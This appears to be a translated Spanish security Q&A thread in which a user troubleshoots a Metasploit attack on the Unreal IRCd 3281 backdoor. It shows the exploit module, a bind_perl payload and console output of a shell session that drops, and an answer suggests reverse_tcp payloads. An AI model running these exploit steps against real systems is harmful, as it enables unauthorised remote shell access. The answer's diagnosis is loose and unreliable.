Metasploit bloqueado en "Enviando un comando de puerta trasera ..."

-3

Estoy intentando usar Metasploit en la puerta trasera Unreal IRCD 3281. He intentado con diferentes tipos de cargas útiles, pero el programa se atasca en la última línea:

msf exploit(unreal_ircd_3281_backdoor) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl 
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started bind handler
[*] Connected to 10.0.1.50:6667...
[*] Command shell session 1 opened (10.0.10.3:43301 -> 10.0.1.50:4444) at 2015-11-27 00:11:32 +0100
[*] Sending backdoor command...

Y después de esto nunca recibo el mensaje de vuelta. ¿Por qué pasó esto? Me parece que tengo una sesión y debería funcionar, pero entonces no pasa nada.

EDIT

Si espero un par de minutos, obtengo esto:

[*] 10.0.1.50 - Command shell session 2 closed.  Reason: Died from Errno::ECONNRESET
msf exploit(unreal_ircd_3281_backdoor) >

Pero nunca tengo la oportunidad de escribir algo en la consola antes de que esto suceda, ¿qué ocurre?

    
pregunta theva 27.11.2015 - 00:19
fuente

1 respuesta

-1

No estoy seguro de que no proporcione mucha información aquí, pero a partir de lo siguiente:

  

[*] 10.0.1.50 - Sesión de shell de comandos 2 cerrada. Motivo: Murió de Errno :: ECONNRESET   msf exploit (unreal_ircd_3281_backdoor) >

Puedo entender que el problema es tu multihandler. Debe verificar su carga útil y asegurarse de haber configurado la correcta (es diferente para cada sistema operativo).

Por ejemplo, para sistemas Windows:

windows/meterpreter/reverse_tcp

Para sistemas similares a Unix / Linux:

generic/shell_reverse_tcp

Después de verificar la carga útil, realice otra vez, vea lo que está obteniendo.

    
respondido por el ostendali 27.11.2015 - 19:00
fuente

Lea otras preguntas en las etiquetas